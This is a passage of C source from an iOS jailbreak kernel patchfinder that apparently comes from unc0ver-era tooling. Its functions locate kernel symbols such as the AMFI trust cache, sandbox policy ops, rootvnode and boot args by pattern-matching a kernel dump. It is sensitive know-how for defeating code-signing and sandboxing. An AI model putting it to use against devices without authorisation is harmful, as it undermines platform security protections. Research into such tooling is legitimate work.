uint32_t op = *(uint32_t*)(Kernel+ref-i);
787
if (op == 0xd10143ff) { // SUB SP, SP, #0x50
788
start = ref-i;
789
break;
790
}
791
}
792
if (!start) {
793
return 0;
794
}
795
796
return start + KernDumpBase;
797
}
798
799
uint64_t Find_bzero(void) {
800
// Just find SYS #3, c7, c4, #1, X3, then get the start of that function
801
addr_t off;
802
uint32_t *k;
803
k = (uint32_t *)(Kernel + XNUCore_Base);
804
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
805
if (k[0] == 0xd50b7423) {
806
off += XNUCore_Base;
807
break;
808
}
809
}
810
811
uint64_t start = BOF64(Kernel, XNUCore_Base, off);
812
if (!start) {
813
return 0;
814
}
815
816
return start + KernDumpBase;
817
}
818
819
addr_t Find_bcopy(void) {
820
// Jumps straight into memmove after switching x0 and x1 around
821
// Guess we just find the switch and that's it
822
addr_t off;
823
uint32_t *k;
824
k = (uint32_t *)(Kernel + XNUCore_Base);
825
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
826
if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
827
return off + XNUCore_Base + KernDumpBase;
828
}
829
}
830
k = (uint32_t *)(Kernel + Prelink_Base);
831
for (off = 0; off < Prelink_Size - 4; off += 4, k++) {
832
if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) {
833
return off + Prelink_Base + KernDumpBase;
834
}
835
}
836
return 0;
837
}
838
839
uint64_t Find_rootvnode(void) {
840
// Find the first reference to the string
841
addr_t ref = Find_strref("/var/run/.vfs_rsrc_streams_%p%x", 1, 0);
842
if (!ref) {
843
return 0;
844
}
845
ref -= KernDumpBase;
846
847
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
848
if (!start) {
849
return 0;
850
}
851
852
// Find MOV X9, #0x2000000000 - it's a pretty distinct instruction
853
addr_t weird_instruction = 0;
854
for (int i = 4; i < 4*0x100; i+=4) {
855
uint32_t op = *(uint32_t *)(Kernel + ref - i);
856
if (op == 0xB25B03E9) {
857
weird_instruction = ref-i;
858
break;
859
}
860
}
861
if (!weird_instruction) {
862
return 0;
863
}
864
865
uint64_t val = Calc64(Kernel, start, weird_instruction, 8);
866
if (!val) {
867
return 0;
868
}
869
870
return val + KernDumpBase;
871
}
872
873
874
addr_t Find_vnode_lookup() {
875
addr_t call, bof;
876
addr_t ref = Find_strref("/private/var/mobile", 0, 0);
877
if (!ref) {
878
return 0;
879
}
880
ref -= KernDumpBase;
881
bof = BOF64(Kernel, XNUCore_Base, ref);
882
if (!bof) {
883
return 0;
884
}
885
call = Step64(Kernel, ref, ref - bof, INSN_CALL);
886
if (!call) {
887
return 0;
888
}
889
call += 4;
890
call = Step64(Kernel, call, call - bof, INSN_CALL);
891
if (!call) {
892
return 0;
893
}
894
call += 4;
895
call = Step64(Kernel, call, call - bof, INSN_CALL);
896
if (!call) {
897
return 0;
898
}
899
return Follow_call64(Kernel, call) + KernDumpBase;
900
}
901
902
addr_t
903
Find_trustcache10_3_2()
904
{
905
addr_t call, func, val;
906
addr_t ref = Find_strref("com.apple.MobileFileIntegrity", 1, 1);
907
if (!ref) {
908
return 0;
909
}
910
ref -= KernDumpBase;
911
call = Step64(Kernel, ref, 32, INSN_CALL);
912
if (!call) {
913
return 0;
914
}
915
call = Step64(Kernel, call+4, 32, INSN_CALL);
916
func = Follow_call64(Kernel, call);
917
if (!func) {
918
return 0;
919
}
920
val = Calc64(Kernel, func, func + 16, 8);
921
if (!val) {
922
return 0;
923
}
924
return val + KernDumpBase;
925
}
926
927
addr_t
928
Find_trustcache()
929
{
930
addr_t cbz, call, func, val;
931
addr_t ref = Find_strref("amfi_prevent_old_entitled_platform_binaries", 1, 1);
932
if (!ref) {
933
return 0;
934
}
935
ref -= KernDumpBase;
936
cbz = Step64(Kernel, ref, 32, INSN_CBZ);
937
if (!cbz) {
938
return 0;
939
}
940
call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);
941
if (!call) {
942
return 0;
943
}
944
func = Follow_call64(Kernel, call);
945
if (!func) {
946
return 0;
947
}
948
val = Calc64(Kernel, func, func + 16, 8);
949
if (!val) {
950
return 0;
951
}
952
return val + KernDumpBase;
953
}
954
955
/*
956
addr_t Find_trustcache(void) {
957
addr_t call, func;
958
addr_t ref = Find_strref("%s: only allowed process can check the trust cache", 1, 1);
959
if (!ref) {
960
return 0;
961
}
962
ref -= KernDumpBase;
963
call = Step64_back(Kernel, ref, 44, INSN_CALL);
964
if (!call) {
965
return 0;
966
}
967
func = Follow_call64(Kernel, call);
968
if (!func) {
969
return 0;
970
}
971
call = Step64(Kernel, func, 32, INSN_CALL);
972
if (!call) {
973
return 0;
974
}
975
func = Follow_call64(Kernel, call);
976
if (!func) {
977
return 0;
978
}
979
call = Step64(Kernel, func, 32, INSN_CALL);
980
if (!call) {
981
return 0;
982
}
983
call = Step64(Kernel, call + 4, 32, INSN_CALL);
984
if (!call) {
985
return 0;
986
}
987
func = Follow_call64(Kernel, call);
988
if (!func) {
989
return 0;
990
}
991
call = Step64(Kernel, func, 48, INSN_CALL);
992
if (!call) {
993
return 0;
994
}
995
uint64_t val = Calc64(Kernel, call, call + 24, 21);
996
if (!val) {
997
// iOS 12
998
ref = Find_strref("\"loadable trust cache buffer too small (%ld) for entries claimed (%d)\"", 1, 0);
999
if (!ref) {
1000
return 0;
1001
}
1002
ref -= KernDumpBase;
1003
1004
val = Calc64(Kernel, ref-12*4, ref-12*4+12, 8);
1005
if (!val) {
1006
return 0;
1007
}
1008
return val + KernDumpBase;
1009
}
1010
return val + KernDumpBase;
1011
}
1012
*/
1013
1014
// people that worked in unc0ver. sparkey maybe?
/*
 * Locate the AMFI trust cache across several kernel generations:
 *   1. iOS 12-style: CBZ after the amfi_prevent... boot-arg string.
 *   2. iOS 11 fallback: second BL after the MobileFileIntegrity string.
 *   3. Deep fallback: chase the call chain out of
 *      "...can check the trust cache" toward isCdhashInTrustCache and
 *      recover X21 there.
 * Returns the trust cache VA, or 0 on failure.
 * NOTE(review): on the deep-fallback path a zero Calc64 result still gets
 * KernDumpBase added — callers appear to treat that as found; confirm.
 */
addr_t Find_amficache() {
    uint64_t cbz, call, func, val;
    uint64_t ref = Find_strref("amfi_prevent_old_entitled_platform_binaries", 1, 1);
    if (!ref) {
        // iOS 11
        ref = Find_strref("com.apple.MobileFileIntegrity", 0, 1);
        if (!ref) {
            return 0;
        }
        ref -= KernDumpBase;
        call = Step64(Kernel, ref, 64, INSN_CALL);
        if (!call) {
            return 0;
        }
        call = Step64(Kernel, call + 4, 64, INSN_CALL);
        goto okay;
    }
    ref -= KernDumpBase;
    cbz = Step64(Kernel, ref, 32, INSN_CBZ);
    if (!cbz) {
        return 0;
    }
    call = Step64(Kernel, Follow_cbz(Kernel, cbz), 4, INSN_CALL);
okay:
    if (!call) {
        return 0;
    }
    func = Follow_call64(Kernel, call);
    if (!func) {
        return 0;
    }
    /* X8 in the callee's first four instructions points at the cache. */
    val = Calc64(Kernel, func, func + 16, 8);
    if (!val) {
        ref = Find_strref("%s: only allowed process can check the trust cache", 1, 1); // Trying to find AppleMobileFileIntegrityUserClient::isCdhashInTrustCache
        if (!ref) {
            return 0;
        }
        ref -= KernDumpBase;
        call = Step64_back(Kernel, ref, 11*4, INSN_CALL);
        if (!call) {
            return 0;
        }
        func = Follow_call64(Kernel, call);
        if (!func) {
            return 0;
        }
        call = Step64(Kernel, func, 8*4, INSN_CALL);
        if (!call) {
            return 0;
        }
        func = Follow_call64(Kernel, call);
        if (!func) {
            return 0;
        }
        call = Step64(Kernel, func, 8*4, INSN_CALL);
        if (!call) {
            return 0;
        }
        call = Step64(Kernel, call+4, 8*4, INSN_CALL);
        if (!call) {
            return 0;
        }
        func = Follow_call64(Kernel, call);
        if (!func) {
            return 0;
        }
        call = Step64(Kernel, func, 12*4, INSN_CALL);
        if (!call) {
            return 0;
        }

        /* This deep in the chain the cache pointer lives in X21. */
        val = Calc64(Kernel, call, call + 6*4, 21);
    }
    return val + KernDumpBase;
}
1090
1091
1092
addr_t Find_zone_map_ref(void) {
1093
// \"Nothing being freed to the zone_map. start = end = %p\\n\"
1094
uint64_t val = KernDumpBase;
1095
1096
addr_t ref = Find_strref("\"Nothing being freed to the zone_map. start = end = %p\\n\"", 1, 0);
1097
ref -= KernDumpBase;
1098
1099
// skip add & adrp for panic str
1100
ref -= 8;
1101
1102
// adrp xX, #_zone_map@PAGE
1103
ref = Step64_back(Kernel, ref, 30, INSN_ADRP);
1104
1105
uint32_t *insn = (uint32_t*)(Kernel+ref);
1106
// get pc
1107
val += ((uint8_t*)(insn) - Kernel) & ~0xfff;
1108
uint8_t xm = *insn & 0x1f;
1109
1110
// don't ask, I wrote this at 5am
1111
val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);
1112
1113
// ldr x, [xX, #_zone_map@PAGEOFF]
1114
++insn;
1115
if ((*insn & 0xF9C00000) != 0xF9400000) {
1116
return 0;
1117
}
1118
1119
// xd == xX, xn == xX,
1120
if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {
1121
return 0;
1122
}
1123
1124
val += ((*insn >> 10) & 0xFFF) << 3;
1125
1126
return val;
1127
}
1128
1129
addr_t Find_OSBoolean_True() {
1130
addr_t val;
1131
addr_t ref = Find_strref("Delay Autounload", 0, 0);
1132
if (!ref) {
1133
return 0;
1134
}
1135
ref -= KernDumpBase;
1136
1137
addr_t weird_instruction = 0;
1138
for (int i = 4; i < 4*0x100; i+=4) {
1139
uint32_t op = *(uint32_t *)(Kernel + ref + i);
1140
if (op == 0x320003E0) {
1141
weird_instruction = ref+i;
1142
break;
1143
}
1144
}
1145
if (!weird_instruction) {
1146
return 0;
1147
}
1148
1149
val = Calc64(Kernel, ref, weird_instruction, 8);
1150
if (!val) {
1151
return 0;
1152
}
1153
1154
return KernelRead_64bits(val + KernDumpBase);
1155
}
1156
1157
/* kOSBooleanFalse sits one pointer (8 bytes) after kOSBooleanTrue.
 * BUGFIX: when the True lookup fails it returns 0; the original then
 * returned a bogus 8 instead of propagating the failure. */
addr_t Find_OSBoolean_False() {
    addr_t true_addr = Find_OSBoolean_True();
    if (!true_addr) {
        return 0;
    }
    return true_addr + 8;
}
1160
addr_t Find_osunserializexml() {
1161
addr_t ref = Find_strref("OSUnserializeXML: %s near line %d\n", 1, 0);
1162
ref -= KernDumpBase;
1163
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
1164
return start + KernDumpBase;
1165
}
1166
1167
addr_t Find_smalloc() {
1168
addr_t ref = Find_strref("sandbox memory allocation failure", 1, 1);
1169
ref -= KernDumpBase;
1170
uint64_t start = BOF64(Kernel, Prelink_Base, ref);
1171
return start + KernDumpBase;
1172
}
1173
1174
addr_t Find_sbops() {
1175
addr_t off, what;
1176
uint8_t *str = Boyermoore_horspool_memmem(Kernel + PString_base, PString_size, (uint8_t *)"Seatbelt sandbox policy", sizeof("Seatbelt sandbox policy") - 1);
1177
if (!str) {
1178
return 0;
1179
}
1180
what = str - Kernel + KernDumpBase;
1181
for (off = 0; off < Kernel_size - Prelink_Base; off += 8) {
1182
if (*(uint64_t *)(Kernel + Prelink_Base + off) == what) {
1183
return *(uint64_t *)(Kernel + Prelink_Base + off + 24);
1184
}
1185
}
1186
return 0;
1187
}
1188
1189
/*
 * VA of PE_state.boot_args: walk backward from the bsd_init panic string
 * through the instruction pattern below, validating each step and
 * accumulating the ADRP page, the ADD page-offset and the LDR offset.
 * Returns 0 when any instruction fails to match the expected shape.
 */
uint64_t Find_bootargs(void) {

    /*
    ADRP            X8, #_PE_state@PAGE
    ADD             X8, X8, #_PE_state@PAGEOFF
    LDR             X8, [X8,#(PE_state__boot_args - 0xFFFFFFF0078BF098)]
    ADD             X8, X8, #0x6C
    STR             X8, [SP,#0x550+var_550]
    ADRP            X0, #aBsdInitCannotF@PAGE ; "\"bsd_init: cannot find root vnode: %s"...
    ADD             X0, X0, #aBsdInitCannotF@PAGEOFF ; "\"bsd_init: cannot find root vnode: %s"...
    BL              _panic
    */

    addr_t ref = Find_strref("\"bsd_init: cannot find root vnode: %s\"", 1, 0);

    if (ref == 0) {
        return 0;
    }

    ref -= KernDumpBase;
    // skip add & adrp for panic str
    ref -= 8;
    uint32_t *insn = (uint32_t*)(Kernel+ref);

    // skip str
    --insn;
    // add xX, xX, #cmdline_offset
    uint8_t xm = *insn&0x1f; /* register carrying the boot_args pointer */
    if (((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {
        return 0;
    }

    //cmdline_offset = (*insn>>10) & 0xfff;

    uint64_t val = KernDumpBase; /* accumulates the decoded address */

    --insn;
    // ldr xX, [xX, #(PE_state__boot_args - PE_state)]
    if ((*insn & 0xF9C00000) != 0xF9400000) {
        return 0;
    }
    // xd == xX, xn == xX,
    if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm) {
        return 0;
    }

    /* Scaled unsigned-offset field of the LDR. */
    val += ((*insn >> 10) & 0xFFF) << 3;

    --insn;
    // add xX, xX, #_PE_state@PAGEOFF
    if ((*insn&0x1f) != xm || ((*insn>>5)&0x1f) != xm || ((*insn>>22)&3) != 0) {
        return 0;
    }

    val += (*insn>>10) & 0xfff;

    --insn;
    /* Must be the ADRP that establishes the page. */
    if ((*insn & 0x1f) != xm) {
        return 0;
    }

    // pc (page of the ADRP itself)
    val += ((uint8_t*)(insn) - Kernel) & ~0xfff;

    // reassemble the ADRP page displacement (immhi:immlo << 12)
    // don't ask, I wrote this at 5am
    val += (*insn<<9 & 0x1ffffc000) | (*insn>>17 & 0x3000);

    return val;
}
1258
1259
1260